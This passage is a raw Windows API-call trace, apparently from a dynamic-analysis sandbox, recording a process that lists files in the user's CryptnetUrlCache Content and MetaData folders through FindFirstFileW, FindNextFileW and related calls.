hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54bc3730, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54bc3730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb11d4fc0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", cAlternateFileName="A9E4F7~1")) returned 1 [0241.411] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned="" [0241.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.411] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bfe570, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bfe570, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe9b34f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", cAlternateFileName="ACF244~1")) returned 1 [0241.411] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned="" [0241.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.411] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe04aaa10, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe04aaa10, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xae4e7080, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", cAlternateFileName="B3BB9C~2")) returned 1 [0241.411] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned="" [0241.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.411] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefc01b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefc01b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaa4ee1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", cAlternateFileName="B3BB9C~1")) returned 1 [0241.411] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned="" [0241.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.411] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54322770, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54322770, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", cAlternateFileName="BC570E~2")) returned 1 [0241.411] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned="" [0241.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.411] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", cAlternateFileName="BC570E~1")) returned 1 [0241.411] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned="" [0241.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.411] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56bb3b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x56bb3b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaeca3800, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", cAlternateFileName="C46E7B~2")) returned 1 [0241.411] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned="" [0241.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.412] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x682fbd00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x682fbd00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae0bca00, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", cAlternateFileName="C46E7B~3")) returned 1 [0241.412] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned="" [0241.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.412] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5461c2f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5461c2f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf67eb30, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", cAlternateFileName="C46E7B~1")) returned 1 [0241.412] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned="" [0241.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.412] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x728c68a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x728c68a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xae63dce0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x5ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", cAlternateFileName="D47DBD~2")) returned 1 [0241.412] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned="" [0241.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.412] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x545f6190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x545f6190, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69b6e1e0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x5ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", cAlternateFileName="D47DBD~1")) returned 1 [0241.412] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned="" [0241.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.412] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x808d4a70, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x808d4a70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x808d4a70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x663, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", cAlternateFileName="D52C56~1")) returned 1 [0241.412] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned="" [0241.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.412] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x683e0540, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x683e0540, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f015a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x64b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", cAlternateFileName="EA6180~1")) returned 1 [0241.412] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned="" [0241.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.412] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf312b90, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf312b90, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf312b90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x64c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", cAlternateFileName="F293AE~1")) returned 1 [0241.412] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned="" [0241.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.412] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x226, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0241.412] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0241.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0241.413] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x226, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0241.413] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0241.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0241.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393c58 | out: hHeap=0x620000) returned 1 [0241.414] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0241.414] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0241.414] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\") returned="MetaData\\" [0241.414] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0241.414] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0241.414] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0241.414] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0241.414] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0241.414] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0241.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0241.414] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0241.414] PathFindFileNameW (pszPath="") returned="" [0241.414] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0241.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.416] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0241.417] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf9eaad0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf9eaad0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf9eaad0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", cAlternateFileName="024823~1")) returned 1 [0241.418] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned="" [0241.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.418] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bd8410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bd8410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe98d390, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x166, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", cAlternateFileName="0F1583~1")) returned 1 [0241.418] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned="" [0241.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.418] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf952550, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf952550, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf952550, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", cAlternateFileName="1BB09B~1")) returned 1 [0241.418] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned="" [0241.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.418] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4c00edb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c00edb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4c00edb0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x10c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1DAF2884EC4DFA96BA4A58D4DBC9C406", cAlternateFileName="1DAF28~1")) returned 1 [0241.418] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned="" [0241.418] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x580eb5c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x580eb5c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaedd4300, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x124, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="23B523C9E7746F715D33C6527C18EB9D", cAlternateFileName="23B523~1")) returned 1 [0241.418] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D") returned="" [0241.418] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc3791460, ftCreationTime.dwHighDateTime=0x1d2e675, ftLastAccessTime.dwLowDateTime=0xc3791460, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc3791460, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3130B1871A126520A8C47861EFE3ED4D", cAlternateFileName="3130B1~1")) returned 1 [0241.418] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0241.418] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53fdc930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53fdc930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf16fc70, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", cAlternateFileName="3388EC~1")) returned 1 [0241.418] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned="" [0241.418] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53b19d30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53b19d30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54583d70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", cAlternateFileName="40E450~1")) returned 1 [0241.418] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned="" [0241.418] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54537ab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54537ab0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae76e7e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", 